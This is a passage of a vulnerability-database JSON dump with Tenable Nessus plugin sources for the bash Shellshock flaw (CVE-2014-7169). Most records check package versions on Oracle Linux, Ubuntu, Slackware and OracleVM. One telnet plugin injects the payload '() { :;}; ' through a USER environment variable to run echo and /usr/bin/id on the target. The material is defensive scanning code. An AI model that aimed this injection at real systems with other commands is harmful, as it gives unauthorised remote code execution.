value:\"cpe:/o:oracle:linux:4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"bash-3.0-27.0.3.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:36", "description": "Tavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2363-1.NASL", "href": "https://www.tenable.com/plugins/nessus/77897", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77897);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-1\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS : bash vulnerability (USN-2363-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"Tavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-1/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:46", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch for CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in USN-2362-1 was incomplete. An attacker could use this issue to bypass certain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:bash", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2363-2.NASL", "href": "https://www.tenable.com/plugins/nessus/77898", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2363-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77898);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"USN\", value:\"2363-2\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Ubuntu 14.04 LTS : bash vulnerability (USN-2363-2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the\npatch for CVE-2014-7169 didn't get properly applied in the Ubuntu\n14.04 LTS package. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nTavis Ormandy discovered that the security fix for Bash included in\nUSN-2362-1 was incomplete. An attacker could use this issue to bypass\ncertain environment restrictions. (CVE-2014-7169).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://usn.ubuntu.com/2363-2/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.3\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:31", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_REMOTE_CODE_EXECUTION_TELNET.NASL", "href": "https://www.tenable.com/plugins/nessus/77857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77857);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update Bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"telnet.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\n\nport = get_service(svc:\"telnet\", default:23, exit_on_fail:TRUE);\n\nglobal_var rcvdata;\nglobal_var cnt;\nglobal_var two_output;\n\nfunction local_telnet_callback()\n{\n local_var data, report;\n\n data = _FCT_ANON_ARGS[0];\n\n # Accumulate each byte as it's received.\n if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d) rcvdata += data[0];\n\n if ( 'Plugin output: 2' >< rcvdata && data[0] == '\\n' )\n {\n two_output = rcvdata;\n return -1;\n }\n\n if ( 'uid=' >< rcvdata && data[0] == '\\n' )\n {\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'id\\' command:\\n' + rcvdata;\n\n security_hole(port:port, extra:report);\n exit(0);\n }\n\n if (\"login: \" >< rcvdata || 'assword:' >< rcvdata )\n exit(0, \"The remote host is running a telnet server that is not configured to run a shell script on connect, and so it is not affected.\");\n}\n\n# Set up the environment.\ntest_command = \"echo Plugin output: $((1+1))\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntwo_output = NULL;\n\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\n# Set up the environment.\ntest_command = \"/usr/bin/id\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\nif (!isnull(two_output))\n{\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'echo Plugin output: $((1+1))\\' command:\\n' + data_protection::sanitize_uid(output:two_output);\n\n security_hole(port:port, extra:report);\n exit(0);\n}\n\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:09:33", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1, and -current to fix a security issue.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:bash", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:13.0", "cpe:/o:slackware:slackware_linux:13.1", "cpe:/o:slackware:slackware_linux:13.37", "cpe:/o:slackware:slackware_linux:14.0", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2014-268-01.NASL", "href": "https://www.tenable.com/plugins/nessus/77877", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2014-268-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77877);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"SSA\", value:\"2014-268-01\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Slackware 13.0 / 13.1 / 13.37 / 14.0 / 14.1 / current : bash (SSA:2014-268-01)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Slackware host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"New bash packages are available for Slackware 13.0, 13.1, 13.37,\n14.0, 14.1, and -current to fix a security issue.\");\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2014&m=slackware-security.495008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?663404aa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:13.37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Slackware Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"13.0\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"i486\", pkgnum:\"2_slack13.0\")) flag++;\nif (slackware_check(osver:\"13.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"3.1.018\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.0\")) flag++;\n\nif (slackware_check(osver:\"13.1\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.1\")) flag++;\nif (slackware_check(osver:\"13.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.1\")) flag++;\n\nif (slackware_check(osver:\"13.37\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"i486\", pkgnum:\"2_slack13.37\")) flag++;\nif (slackware_check(osver:\"13.37\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.1.012\", pkgarch:\"x86_64\", pkgnum:\"2_slack13.37\")) flag++;\n\nif (slackware_check(osver:\"14.0\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"i486\", pkgnum:\"2_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.2.048\", pkgarch:\"x86_64\", pkgnum:\"2_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"i486\", pkgnum:\"2\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"bash\", pkgver:\"4.3.025\", pkgarch:\"x86_64\", pkgnum:\"2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:10:13", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644", "cvss3": {"score": null, "vector": null}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 3.2 : bash (OVMSA-2014-0022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.2"], "id": "ORACLEVM_OVMSA-2014-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/78238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2014-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78238);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"OracleVM 3.2 : bash (OVMSA-2014-0022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote OracleVM host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2014-7169 - bypass patch bug Related: #1146321\n\n - CVE-2014-7169 - proper 3.2 backport - courtesy of\n Florian Weimer Related: #1146321\n\n - (CVE-2014-7169) Resolves: #1146321\n\n - Check for fishy environment Resolves: #1141644\");\n # https://oss.oracle.com/pipermail/oraclevm-errata/2014-September/000223.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6f4b2b7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", 